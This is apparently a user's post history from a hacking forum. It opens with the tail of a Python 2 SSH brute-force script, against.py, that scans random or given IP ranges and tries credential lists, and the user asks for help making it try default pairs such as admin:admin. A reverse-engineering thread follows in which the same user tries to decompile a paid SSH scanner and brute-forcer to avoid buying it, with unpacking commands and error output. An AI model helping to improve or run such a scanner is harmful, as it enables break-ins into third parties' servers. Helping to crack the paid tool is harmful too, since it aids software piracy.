# output when against.py finished all routines
def finished():
    print '[*] game over!!!'

def main():
    banner()
    args = argspage()

    if args.U:
        file_exists(args.U)
    if args.L:
        file_exists(args.L)
    if args.o:
        test_file(args.o)
    if args.O:
        test_file(args.O)

    if args.i:
        ip_range(args)
        unsort_hostlist()
    elif args.I:
        ip_list(args.I)
    else:
        rand_ip(args)

    time.sleep(0.1)
    empty_hostlist()
    fork_it(args)
    finished()

if __name__ == '__main__':
    HOSTLIST = []
    try:
        logging.disable(logging.CRITICAL)
        main()
    except KeyboardInterrupt:
        print '\nbye bye!!!'
        time.sleep(0.2)
        os._exit(1)
There's a problem with the code is : it makes a loop of ALL user with ALL password from the text file; I need to just check some login pair for ex: admin:admin ; test:test.. so it can help to reduce the time of checking.
Since I'm very new to python, I hope one can help me to make this improvement.
Thank you very much for visiting my post. I send you my best regards and looking forward to hearing from you guys :)


6
Reverse Engineering / Re: [question] Java decompiler for exe
« on: April 27, 2014, 07:16:56 PM »
In fact, there is not output file. The previous version of the software were written in C# - if this information is helpful.

7
Reverse Engineering / Re: [question] Java decompiler for exe
« on: April 26, 2014, 05:37:33 PM »
I tried many times exactly the step of the instruction but nothing happen. I don't know why that the exe file can't execute from command line. It just can be executed by double click.

8
Reverse Engineering / Re: [question] Java decompiler for exe
« on: April 26, 2014, 08:06:14 AM »
Code: [Select]
set old_opts=%JAVA_TOOL_OPTIONS%
set JAVA_TOOL_OPTIONS=-javaagent:e2j-agent.jar(=output-file)
I really don't know what do they mean with the 3rd instruction "C:\dev\e2j>packed-exe
  ...
  C:\dev\e2j>set JAVA_TOOL_OPTIONS=%old_opts%"
And when trying to run it directly I had this error

Code: [Select]
C:\Documents and Settings\Administrator\My Documents\Downloads\e2j-master\e2j-ma
ster>java e2j-agent.jar
Picked up JAVA_TOOL_OPTIONS: %JAVA_TOOL_OPTIONS%
Unrecognized option: %JAVA_TOOL_OPTIONS%
Error: Could not create the Java Virtual Machine.
Error: A fatal exception has occurred. Program will exit.
I'm sorry for my bad skill with java. Really appreciate your afford to help me.

9
Reverse Engineering / Re: [question] Java decompiler for exe
« on: April 25, 2014, 07:01:14 AM »
Thank you for moving to the right place Architect, at first I confused because it wrote in Java so that why I post the topic in that place.
Quote from: Deque on April 24, 2014, 12:02:49 PM
But I found a possible solution. Looks like someone wrote a program to unpack protected jar2exe files: https://github.com/slavemaster/e2j

The usage of e2j really a messy I can't handle that. I tried to follow steps but haven't got luck yet.

10
Reverse Engineering / Re: [question] Java decompiler for exe
« on: April 24, 2014, 04:50:39 AM »
Thank you for your reply,
I tried the updated version and it go smoothly and got the same with yours result.
As your suggestion I renamed to.zip and extracted but the .class files only 7kB while the original file is 1MB.
Using Dj java decompiler I could extract the source but seem like it not so helpful in this case.

I still confuse about the step of your suggestion :  "try to cut the jar at the offsets specified and try to extract after"
I tried the -d option to extract the dump file but to be honest I don't know what next step with this.
Since Java is new to me, I'm sorry for any troubles and really appreciate to get your next response :)

11
Reverse Engineering / Re: [question] Java decompiler for exe
« on: April 22, 2014, 02:55:45 AM »
Thank you very much for your response. I did it with no luck. Hope to see another solutions for this case. Cheer :)

Code: [Select]
C:\Users\buda\Downloads\jwscan>java -jar jwscan.jar SSH.exe

____ _  _ _ _    ___  ____ _  _ ____           _ _ _ _ ____ ____ ____ _  _
|___ |  | | |      /  |  | |\ | |___    __     | | | | [__  |    |__| |\ |
|___  \/  | |___  /__ |__| | \| |___          _| |_|_| ___] |___ |  | | \|
                             by Deque

scanning file ...

file name: SSH.exe

Exception in thread "main" java.lang.IllegalArgumentException: MALFORMED
        at java.util.zip.ZipCoder.toString(Unknown Source)
        at java.util.zip.ZipCoder.toStringUTF8(Unknown Source)
        at java.util.zip.ZipInputStream.readLOC(Unknown Source)
        at java.util.zip.ZipInputStream.getNextEntry(Unknown Source)
        at com.github.katjahahn.tools.Jar2ExeScanner.readZipEntriesAt(Jar2ExeSca
nner.scala:47)
        at com.github.katjahahn.tools.Jar2ExeScanner$$anonfun$getZipAddresses$1.
apply$mcZJ$sp(Jar2ExeScanner.scala:104)
        at com.github.katjahahn.tools.Jar2ExeScanner$$anonfun$getZipAddresses$1.
apply(Jar2ExeScanner.scala:102)
        at com.github.katjahahn.tools.Jar2ExeScanner$$anonfun$getZipAddresses$1.
apply(Jar2ExeScanner.scala:102)
        at scala.collection.TraversableLike$$anonfun$filter$1.apply(TraversableL
ike.scala:264)
        at scala.collection.immutable.List.foreach(List.scala:318)
        at scala.collection.TraversableLike$class.filter(TraversableLike.scala:2
63)
        at scala.collection.AbstractTraversable.filter(Traversable.scala:105)
        at com.github.katjahahn.tools.Jar2ExeScanner.getZipAddresses(Jar2ExeScan
ner.scala:102)
        at com.github.katjahahn.tools.Jar2ExeScanner.createReport(Jar2ExeScanner
.scala:78)
        at com.github.katjahahn.tools.Jar2ExeScanner$.invokeCLI(Jar2ExeScanner.s
cala:192)
        at com.github.katjahahn.tools.Jar2ExeScanner$.main(Jar2ExeScanner.scala:
173)
        at com.github.katjahahn.tools.Jar2ExeScanner.main(Jar2ExeScanner.scala)

12
Reverse Engineering / [question] Java decompiler for exe
« on: April 21, 2014, 05:33:22 AM »
Dear all,
I found 1 great software to scan ssh socks. The software scan for ip range to get the ssh support ips , after that it brute force the simple login from a txt file.
The question is: Since it an exe file but using Java so I want to ask if is there a way to extract, decompile it in to source.
They sell the software with a silly price so I really need to decompile it.
Thank you very much for your attention in my topic.
Here is the following software
Code: [Select]
https://www.dropbox.com/s/570tet3lfp0e1f3/Lazy%20SSH%201.6.6.rarRequirements
- Java: https://www.java.com/en/download/
- Microsoft Visual C++ 2010: http://www.microsoft.com/en-us/download/details.aspx?id=5555

Pages: [1]


Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.